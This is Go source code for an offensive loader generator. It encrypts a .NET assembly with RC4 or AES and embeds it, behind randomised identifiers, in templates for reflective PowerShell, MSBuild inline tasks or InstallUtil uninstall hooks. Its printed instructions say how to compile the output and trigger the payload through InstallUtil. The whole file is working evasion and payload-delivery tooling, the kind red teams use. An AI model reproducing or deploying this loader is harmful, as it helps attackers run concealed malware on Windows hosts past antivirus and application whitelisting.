package main import ( "crypto/aes" "crypto/cipher" cryptoRand "crypto/rand" "encoding/base64" "flag" "fmt" "io/ioutil" mathRand "math/rand" "os" "path/filepath" "regexp" "strings" "time" ) const keySpace = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" const keySpaceForKeys = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" func rc4(key, data []byte) []byte { s := make([]int, 256) for i := 0; i < 256; i++ { s[i] = i } j := 0 for i := 0; i < 256; i++ { j = (j + s[i] + int(key[i%len(key)])) % 256 s[i], s[j] = s[j], s[i] } encrypted := make([]byte, len(data)) i, j := 0, 0 for k := 0; k < len(data); k++ { i = (i + 1) % 256 j = (j + s[i]) % 256 s[i], s[j] = s[j], s[i] t := (s[i] + s[j]) % 256 encrypted[k] = data[k] ^ byte(s[t]) } return encrypted } func aesEncrypt(key, data []byte) ([]byte, []byte, error) { block, err := aes.NewCipher(key) if err != nil { return nil, nil, fmt.Errorf("[err] failed to create AES cipher: %v", err) } iv := make([]byte, aes.BlockSize) if _, err := cryptoRand.Read(iv); err != nil { return nil, nil, fmt.Errorf("[err] failed to generate IV: %v", err) } paddedData := padData(data, aes.BlockSize) ciphertext := make([]byte, len(paddedData)) mode := cipher.NewCBCEncrypter(block, iv) mode.CryptBlocks(ciphertext, paddedData) return ciphertext, iv, nil } func padData(data []byte, blockSize int) []byte { padding := blockSize - len(data)%blockSize padText := make([]byte, len(data)+padding) copy(padText, data) for i := len(data); i < len(padText); i++ { padText[i] = byte(padding) } return padText } func encryptData(encryptionType string, key []byte, data []byte) (ciphertext []byte, iv []byte, err error) { if encryptionType == "rc4" { ciphertext = rc4(key, data) return ciphertext, nil, nil } else if encryptionType == "aes" { ciphertext, iv, err = aesEncrypt(key, data) if err != nil { return nil, nil, err } return ciphertext, iv, nil } return nil, nil, fmt.Errorf("[err] unsupported encryption type: %s", encryptionType) } func generatePassword(length int) string { b := make([]byte, length) for i := range b { b[i] = keySpaceForKeys[mathRand.Intn(len(keySpaceForKeys))] } return string(b) } func obfuscate(s string, length int) (string, error) { if length <= 0 { return "", fmt.Errorf("[err] length must be a positive integer") } placeholderValues := make(map[string]string) re := regexp.MustCompile(`<%=obf (.*?) %>`) result := re.ReplaceAllStringFunc(s, func(match string) string { placeholder := re.FindStringSubmatch(match)[1] if val, exists := placeholderValues[placeholder]; exists { return val } var randomString strings.Builder for i := 0; i < length; i++ { randomString.WriteByte(keySpace[mathRand.Intn(len(keySpace))]) } placeholderValues[placeholder] = randomString.String() return placeholderValues[placeholder] }) return result, nil } func generatePowerShellLdr(filePath string, obfuscationLength, keyLength int, encryptionType string) error { data, err := ioutil.ReadFile(filePath) if err != nil { return fmt.Errorf("[err] failed to read file: %v", err) } key := []byte(generatePassword(keyLength)) ciphertext, iv, err := encryptData(encryptionType, key, data) if err != nil { return fmt.Errorf("[err] encryption failed: %v", err) } b64 := base64.StdEncoding.EncodeToString(ciphertext) b64IV := "" if encryptionType == "aes" { b64IV = base64.StdEncoding.EncodeToString(iv) } baseName := filepath.Base(filePath) assemblyName := strings.TrimSuffix(baseName, filepath.Ext(baseName)) + ".exe" outputFile := fmt.Sprintf("%s_reflective.ps1", assemblyName) template := "" if encryptionType == "rc4" { template = ` function <%=obf RC4Decrypt %> { param ( [byte[]]$<%=obf data %>, [byte[]]$<%=obf key %> ) $<%=obf S %> = 0..255 $<%=obf j %> = 0 for ($<%=obf i %> = 0; $<%=obf i %> -lt 256; $<%=obf i %>++) { $<%=obf j %> = ($<%=obf j %> + $<%=obf S %>[$<%=obf i %>] + $<%=obf key %>[$<%=obf i %> % $<%=obf key %>.Length]) % 256 $<%=obf S %>[$<%=obf i %>], $<%=obf S %>[$<%=obf j %>] = $<%=obf S %>[$<%=obf j %>], $<%=obf S %>[$<%=obf i %>] } $<%=obf output %> = New-Object byte[] $<%=obf data %>.Length $<%=obf i %> = 0 $<%=obf j %> = 0 for ($<%=obf k %> = 0; $<%=obf k %> -lt $<%=obf data %>.Length; $<%=obf k %>++) { $<%=obf i %> = ($<%=obf i %> + 1) % 256 $<%=obf j %> = ($<%=obf j %> + $<%=obf S %>[$<%=obf i %>]) % 256 $<%=obf S %>[$<%=obf i %>], $<%=obf S %>[$<%=obf j %>] = $<%=obf S %>[$<%=obf j %>], $<%=obf S %>[$<%=obf i %>] $<%=obf t %> = ($<%=obf S %>[$<%=obf i %>] + $<%=obf S %>[$<%=obf j %>]) % 256 $<%=obf output %>[$<%=obf k %>] = $<%=obf data %>[$<%=obf k %>] -bxor $<%=obf S %>[$<%=obf t %>] } return $<%=obf output %> } $<%=obf key %> = [System.Text.Encoding]::UTF8.GetBytes("{key}") $<%=obf bytes %> = [Convert]::FromBase64String("{b64}") [byte[]]$<%=obf decrypted %> = <%=obf RC4Decrypt %> -<%=obf data %> $<%=obf bytes %> -<%=obf key %> $<%=obf key %> [Reflection.Assembly]::Load($<%=obf decrypted %>) ` } else { template = ` function <%=obf AESDecrypt %> { param($<%=obf aesKey %>, $<%=obf aesIv %>, $<%=obf encryptedAssembly %>) $<%=obf iv %> = [Convert]::FromBase64String($<%=obf aesIv %>) $<%=obf encryptedBytes %> = [Convert]::FromBase64String($<%=obf encryptedAssembly %>) $<%=obf aes %> = New-Object Security.Cryptography.AesCryptoServiceProvider $<%=obf aes %>.KeySize = 256 $<%=obf aes %>.BlockSize = 128 $<%=obf aes %>.Mode = [Security.Cryptography.CipherMode]::CBC $<%=obf aes %>.Padding = [Security.Cryptography.PaddingMode]::PKCS7 $<%=obf aes %>.Key = [System.Text.Encoding]::UTF8.GetBytes($<%=obf aesKey %>) $<%=obf aes %>.IV = $<%=obf iv %> $<%=obf ms %> = New-Object System.IO.MemoryStream $<%=obf encryptedBytes %>, 0, $<%=obf encryptedBytes %>.Length $<%=obf cs %> = New-Object Security.Cryptography.CryptoStream $<%=obf ms %>, $<%=obf aes %>.CreateDecryptor(), 0 $<%=obf cs %>.Read($<%=obf encryptedBytes %>, 0, $<%=obf encryptedBytes %>.Length) | Out-Null return $<%=obf encryptedBytes %> } $<%=obf key %> = "{key}" $<%=obf iv %> = "{b64IV}" $<%=obf encryptedAssembly %> = "{b64}" [byte[]]$<%=obf decryptedBytes %> = <%=obf AESDecrypt %> -<%=obf aesKey %> $<%=obf key %> -<%=obf aesIv %> $<%=obf iv %> -<%=obf encryptedAssembly %> $<%=obf encryptedAssembly %> [Reflection.Assembly]::Load($<%=obf decryptedBytes %>) ` } template = strings.ReplaceAll(template, "{key}", string(key)) template = strings.ReplaceAll(template, "{b64}", b64) if encryptionType == "aes" { template = strings.ReplaceAll(template, "{b64IV}", b64IV) } obfuscated, err := obfuscate(template, obfuscationLength) if err != nil { return fmt.Errorf("[err] obfuscation failed: %v", err) } err = ioutil.WriteFile(outputFile, []byte(obfuscated), 0644) if err != nil { return fmt.Errorf("[err] failed to write output file: %v", err) } fmt.Printf("[inf] created \"%s\" containing \"%s\"\n", outputFile, filePath) fmt.Println("[inf] call assembly method with [.]::(\"arg1 arg2\".Split())") return nil } func generateMSBuildLdr(filePath string, obfuscationLength, keyLength int, dotnetArch, encryptionType string) error { data, err := ioutil.ReadFile(filePath) if err != nil { return fmt.Errorf("[err] failed to read file: %v", err) } key := []byte(generatePassword(keyLength)) ciphertext, iv, err := encryptData(encryptionType, key, data) if err != nil { return fmt.Errorf("[err] encryption failed: %v", err) } b64 := base64.StdEncoding.EncodeToString(ciphertext) b64IV := "" if encryptionType == "aes" { b64IV = base64.StdEncoding.EncodeToString(iv) } archPath := "" if dotnetArch == "x86" { archPath = "" } else { archPath = "64" } binSize := len(ciphertext) baseName := filepath.Base(filePath) assemblyName := strings.TrimSuffix(baseName, filepath.Ext(baseName)) + ".exe" outputFile := fmt.Sprintf("%s_msbuild.csproj", assemblyName) template := "" if encryptionType == "rc4" { template = ` <<%=obf GhostBuilder %>/> : Task, ITask { public static byte[] <%=obf RC4 %>(byte[] <%=obf pwd %>, byte[] <%=obf data %>) { int <%=obf a %>, <%=obf i %>, <%=obf j %>, <%=obf k %>, <%=obf tmp %>; int[] <%=obf key %> = new int[256]; int[] <%=obf box %> = new int[256]; byte[] <%=obf cipher %> = new byte[<%=obf data %>.Length]; for (<%=obf i %> = 0; <%=obf i %> < 256; <%=obf i %>++) { <%=obf key %>[<%=obf i %>] = <%=obf pwd %>[<%=obf i %> % <%=obf pwd %>.Length]; <%=obf box %>[<%=obf i %>] = <%=obf i %>; } for (<%=obf j %> = <%=obf i %> = 0; <%=obf i %> < 256; <%=obf i %>++) { <%=obf j %> = (<%=obf j %> + <%=obf box %>[<%=obf i %>] + <%=obf key %>[<%=obf i %>]) % 256; <%=obf tmp %> = <%=obf box %>[<%=obf i %>]; <%=obf box %>[<%=obf i %>] = <%=obf box %>[<%=obf j %>]; <%=obf box %>[<%=obf j %>] = <%=obf tmp %>; } for (<%=obf a %> = <%=obf j %> = <%=obf i %> = 0; <%=obf i %> < <%=obf data %>.Length; <%=obf i %>++) { <%=obf a %>++; <%=obf a %> %= 256; <%=obf j %> += <%=obf box %>[<%=obf a %>]; <%=obf j %> %= 256; <%=obf tmp %> = <%=obf box %>[<%=obf a %>]; <%=obf box %>[<%=obf a %>] = <%=obf box %>[<%=obf j %>]; <%=obf box %>[<%=obf j %>] = <%=obf tmp %>; <%=obf k %> = <%=obf box %>[(<%=obf box %>[<%=obf a %>] + <%=obf box %>[<%=obf j %>]) % 256]; <%=obf cipher %>[<%=obf i %>] = (byte)(<%=obf data %>[<%=obf i %>] ^ <%=obf k %>); } return <%=obf cipher %>; } public override bool Execute() { string[] <%=obf args %> = new string[] { "" }; string <%=obf encodedBin %> = "{b64}"; int <%=obf binSize %> = {binSize}; string <%=obf key %> = "{key}"; byte[] <%=obf bytesBin %> = new byte[<%=obf binSize %>]; using (MemoryStream <%=obf inputStream %> = new MemoryStream(Convert.FromBase64String(<%=obf encodedBin %>))) { <%=obf inputStream %>.Read(<%=obf bytesBin %>, 0, <%=obf binSize %>); } byte[] <%=obf final %> = <%=obf RC4 %>(Encoding.UTF8.GetBytes(<%=obf key %>), <%=obf bytesBin %>); Assembly <%=obf assembly %> = Assembly.Load(<%=obf final %>); <%=obf assembly %>.EntryPoint.Invoke(null, new object[] { <%=obf args %> }); return true; } } ]]> ` } else { template = ` <<%=obf GhostBuilder %>/> : Task, ITask { public static byte[] <%=obf AesDecrypt %>(byte[] <%=obf cipherText %>, byte[] <%=obf key %>, byte[] <%=obf iv %>) { using (Aes <%=obf aesAlg %> = Aes.Create()) { <%=obf aesAlg %>.KeySize = 256; <%=obf aesAlg %>.BlockSize = 128; <%=obf aesAlg %>.Mode = CipherMode.CBC; <%=obf aesAlg %>.Padding = PaddingMode.PKCS7; <%=obf aesAlg %>.Key = <%=obf key %>; <%=obf aesAlg %>.IV = <%=obf iv %>; ICryptoTransform <%=obf decryptor %> = <%=obf aesAlg %>.CreateDecryptor(<%=obf aesAlg %>.Key, <%=obf aesAlg %>.IV); using (MemoryStream <%=obf msDecrypt %> = new MemoryStream()) { using (CryptoStream <%=obf csDecrypt %> = new CryptoStream(<%=obf msDecrypt %>, <%=obf decryptor %>, CryptoStreamMode.Write)) { <%=obf csDecrypt %>.Write(<%=obf cipherText %>, 0, <%=obf cipherText %>.Length); <%=obf csDecrypt %>.FlushFinalBlock(); } return <%=obf msDecrypt %>.ToArray(); } } } public override bool Execute() { string[] <%=obf args %> = new string[] { "" }; string <%=obf encodedBin %> = "{b64}"; int <%=obf binSize %> = {binSize}; byte[] <%=obf key %> = Encoding.UTF8.GetBytes("{key}"); byte[] <%=obf iv %> = Convert.FromBase64String("{b64IV}"); byte[] <%=obf bytesBin %> = new byte[<%=obf binSize %>]; using (MemoryStream <%=obf inputStream %> = new MemoryStream(Convert.FromBase64String(<%=obf encodedBin %>))) { <%=obf inputStream %>.Read(<%=obf bytesBin %>, 0, <%=obf binSize %>); } byte[] <%=obf final %> = <%=obf AesDecrypt %>(<%=obf bytesBin %>, <%=obf key %>, <%=obf iv %>); Assembly <%=obf assembly %> = Assembly.Load(<%=obf final %>); <%=obf assembly %>.EntryPoint.Invoke(null, new object[] { <%=obf args %> }); return true; } } ]]> ` } template = strings.ReplaceAll(template, "{key}", string(key)) template = strings.ReplaceAll(template, "{b64}", b64) template = strings.ReplaceAll(template, "{binSize}", fmt.Sprintf("%d", binSize)) template = strings.ReplaceAll(template, "<%=obf arch %>", archPath) if encryptionType == "aes" { template = strings.ReplaceAll(template, "{b64IV}", b64IV) } obfuscated, err := obfuscate(template, obfuscationLength) if err != nil { return fmt.Errorf("[err] obfuscation failed: %v", err) } err = ioutil.WriteFile(outputFile, []byte(obfuscated), 0644) if err != nil { return fmt.Errorf("[err] failed to write output file: %v", err) } fmt.Printf("[inf] created \"%s\" containing \"%s\"\n", outputFile, filePath) fmt.Println("[inf] change \"string[] = new string[] { \"\" };\" to add arguments") return nil } func generateInstallUtilLdr(filePath string, obfuscationLength, keyLength int, encryptionType string) error { data, err := ioutil.ReadFile(filePath) if err != nil { return fmt.Errorf("[err] failed to read file: %v", err) } key := []byte(generatePassword(keyLength)) ciphertext, iv, err := encryptData(encryptionType, key, data) if err != nil { return fmt.Errorf("[err] encryption failed: %v", err) } b64 := base64.StdEncoding.EncodeToString(ciphertext) b64IV := "" if encryptionType == "aes" { b64IV = base64.StdEncoding.EncodeToString(iv) } binSize := len(ciphertext) baseName := filepath.Base(filePath) assemblyName := strings.TrimSuffix(baseName, filepath.Ext(baseName)) outputFile := fmt.Sprintf("%s.cs", assemblyName) template := "" if encryptionType == "rc4" { template = ` using System; using System.IO; using System.Text; using System.Reflection; using System.Configuration.Install; namespace <%=obf Namespace %> { public class <%=obf Program %> { public static void Main(string[] args) {} } [System.ComponentModel.RunInstaller(true)] public class <%=obf Installer %> : Installer { public static byte[] <%=obf RC4 %>(byte[] <%=obf pwd %>, byte[] <%=obf data %>) { int <%=obf a %>, <%=obf i %>, <%=obf j %>, <%=obf k %>, <%=obf tmp %>; int[] <%=obf key %> = new int[256]; int[] <%=obf box %> = new int[256]; byte[] <%=obf cipher %> = new byte[<%=obf data %>.Length]; for (<%=obf i %> = 0; <%=obf i %> < 256; <%=obf i %>++) { <%=obf key %>[<%=obf i %>] = <%=obf pwd %>[<%=obf i %> % <%=obf pwd %>.Length]; <%=obf box %>[<%=obf i %>] = <%=obf i %>; } for (<%=obf j %> = <%=obf i %> = 0; <%=obf i %> < 256; <%=obf i %>++) { <%=obf j %> = (<%=obf j %> + <%=obf box %>[<%=obf i %>] + <%=obf key %>[<%=obf i %>]) % 256; <%=obf tmp %> = <%=obf box %>[<%=obf i %>]; <%=obf box %>[<%=obf i %>] = <%=obf box %>[<%=obf j %>]; <%=obf box %>[<%=obf j %>] = <%=obf tmp %>; } for (<%=obf a %> = <%=obf j %> = <%=obf i %> = 0; <%=obf i %> < <%=obf data %>.Length; <%=obf i %>++) { <%=obf a %>++; <%=obf a %> %= 256; <%=obf j %> += <%=obf box %>[<%=obf a %>]; <%=obf j %> %= 256; <%=obf tmp %> = <%=obf box %>[<%=obf a %>]; <%=obf box %>[<%=obf a %>] = <%=obf box %>[<%=obf j %>]; <%=obf box %>[<%=obf j %>] = <%=obf tmp %>; <%=obf k %> = <%=obf box %>[(<%=obf box %>[<%=obf a %>] + <%=obf box %>[<%=obf j %>]) % 256]; <%=obf cipher %>[<%=obf i %>] = (byte)(<%=obf data %>[<%=obf i %>] ^ <%=obf k %>); } return <%=obf cipher %>; } public override void Uninstall(System.Collections.IDictionary savedState) { try { string[] <%=obf args %> = new string[] { "" }; string <%=obf encodedBin %> = "{b64}"; int <%=obf binSize %> = {binSize}; string <%=obf key %> = "{key}"; byte[] <%=obf bytesBin %> = new byte[<%=obf binSize %>]; using (MemoryStream <%=obf inputStream %> = new MemoryStream(Convert.FromBase64String(<%=obf encodedBin %>))) { <%=obf inputStream %>.Read(<%=obf bytesBin %>, 0, <%=obf binSize %>); } byte[] <%=obf final %> = <%=obf RC4 %>(Encoding.UTF8.GetBytes(<%=obf key %>), <%=obf bytesBin %>); Assembly <%=obf assembly %> = Assembly.Load(<%=obf final %>); <%=obf assembly %>.EntryPoint.Invoke(null, new object[] { <%=obf args %> }); } catch (Exception) {} base.Uninstall(savedState); } } } ` } else { template = ` using System; using System.IO; using System.Text; using System.Reflection; using System.Configuration.Install; using System.Security.Cryptography; namespace <%=obf Namespace %> { public class <%=obf Program %> { public static void Main(string[] args) {} } [System.ComponentModel.RunInstaller(true)] public class <%=obf Installer %> : Installer { public static byte[] <%=obf AesDecrypt %>(byte[] <%=obf cipherText %>, byte[] <%=obf key %>, byte[] <%=obf iv %>) { using (Aes <%=obf aesAlg %> = Aes.Create()) { <%=obf aesAlg %>.KeySize = 256; <%=obf aesAlg %>.BlockSize = 128; <%=obf aesAlg %>.Mode = CipherMode.CBC; <%=obf aesAlg %>.Padding = PaddingMode.PKCS7; <%=obf aesAlg %>.Key = <%=obf key %>; <%=obf aesAlg %>.IV = <%=obf iv %>; ICryptoTransform <%=obf decryptor %> = <%=obf aesAlg %>.CreateDecryptor(<%=obf aesAlg %>.Key, <%=obf aesAlg %>.IV); using (MemoryStream <%=obf msDecrypt %> = new MemoryStream()) { using (CryptoStream <%=obf csDecrypt %> = new CryptoStream(<%=obf msDecrypt %>, <%=obf decryptor %>, CryptoStreamMode.Write)) { <%=obf csDecrypt %>.Write(<%=obf cipherText %>, 0, <%=obf cipherText %>.Length); <%=obf csDecrypt %>.FlushFinalBlock(); } return <%=obf msDecrypt %>.ToArray(); } } } public override void Uninstall(System.Collections.IDictionary savedState) { try { string[] <%=obf args %> = new string[] { "" }; string <%=obf encodedBin %> = "{b64}"; int <%=obf binSize %> = {binSize}; byte[] <%=obf key %> = Encoding.UTF8.GetBytes("{key}"); byte[] <%=obf iv %> = Convert.FromBase64String("{b64IV}"); byte[] <%=obf bytesBin %> = new byte[<%=obf binSize %>]; using (MemoryStream <%=obf inputStream %> = new MemoryStream(Convert.FromBase64String(<%=obf encodedBin %>))) { <%=obf inputStream %>.Read(<%=obf bytesBin %>, 0, <%=obf binSize %>); } byte[] <%=obf final %> = <%=obf AesDecrypt %>(<%=obf bytesBin %>, <%=obf key %>, <%=obf iv %>); Assembly <%=obf assembly %> = Assembly.Load(<%=obf final %>); <%=obf assembly %>.EntryPoint.Invoke(null, new object[] { <%=obf args %> }); } catch (Exception) {} base.Uninstall(savedState); } } } ` } template = strings.ReplaceAll(template, "{key}", string(key)) template = strings.ReplaceAll(template, "{b64}", b64) template = strings.ReplaceAll(template, "{binSize}", fmt.Sprintf("%d", binSize)) if encryptionType == "aes" { template = strings.ReplaceAll(template, "{b64IV}", b64IV) } obfuscated, err := obfuscate(template, obfuscationLength) if err != nil { return fmt.Errorf("[err] obfuscation failed: %v", err) } err = ioutil.WriteFile(outputFile, []byte(obfuscated), 0644) if err != nil { return fmt.Errorf("[err] failed to write output file: %v", err) } fmt.Printf("[inf] created \"%s\" containing \"%s\"\n", outputFile, filePath) fmt.Printf("[inf] compile with: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /platform:x64|x86 /out:%s.exe %s\n", assemblyName, outputFile) fmt.Printf("[inf] uninstall to execute payload: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /U /logfile= /LogToConsole=false %s.exe\n", assemblyName) return nil } func main() { filePath := flag.String("f", "", "input file path") outputType := flag.String("t", "powershell", "loader type: powershell|msbuild|installutil") encryptionType := flag.String("e", "rc4", "encryption type: rc4|aes") obfuscationLength := flag.Int("obf-len", 8, "length of obfuscated strings") keyLength := flag.Int("key-len", 32, "length of encryption key") dotnetArch := flag.String("dotnet-architecture", "x64", ".net architecture for msbuild: x86|x64") flag.Parse() if *filePath == "" { fmt.Println("[err] -f/--file is required") flag.Usage() os.Exit(1) } if *outputType != "powershell" && *outputType != "msbuild" && *outputType != "installutil" { fmt.Println("[err] -t/--type must be 'powershell', 'msbuild', or 'installutil'") flag.Usage() os.Exit(1) } if *encryptionType != "rc4" && *encryptionType != "aes" { fmt.Println("[err] -e/--encryption must be 'rc4' or 'aes'") flag.Usage() os.Exit(1) } if *obfuscationLength <= 0 { fmt.Println("[err] -obf-len must be a positive integer") flag.Usage() os.Exit(1) } if *keyLength <= 0 || (*encryptionType == "aes" && *keyLength != 32) { fmt.Println("[err] -key-len must be a positive integer, 32 for AES") flag.Usage() os.Exit(1) } if *outputType == "msbuild" && *dotnetArch != "x86" && *dotnetArch != "x64" { fmt.Println("[err] --dotnet-architecture must be 'x86' or 'x64'") flag.Usage() os.Exit(1) } mathRand.Seed(time.Now().UnixNano()) var err error if *outputType == "powershell" { err = generatePowerShellLdr(*filePath, *obfuscationLength, *keyLength, *encryptionType) } else if *outputType == "msbuild" { err = generateMSBuildLdr(*filePath, *obfuscationLength, *keyLength, *dotnetArch, *encryptionType) } else { err = generateInstallUtilLdr(*filePath, *obfuscationLength, *keyLength, *encryptionType) } if err != nil { fmt.Printf("[err] %v\n", err) os.Exit(1) } }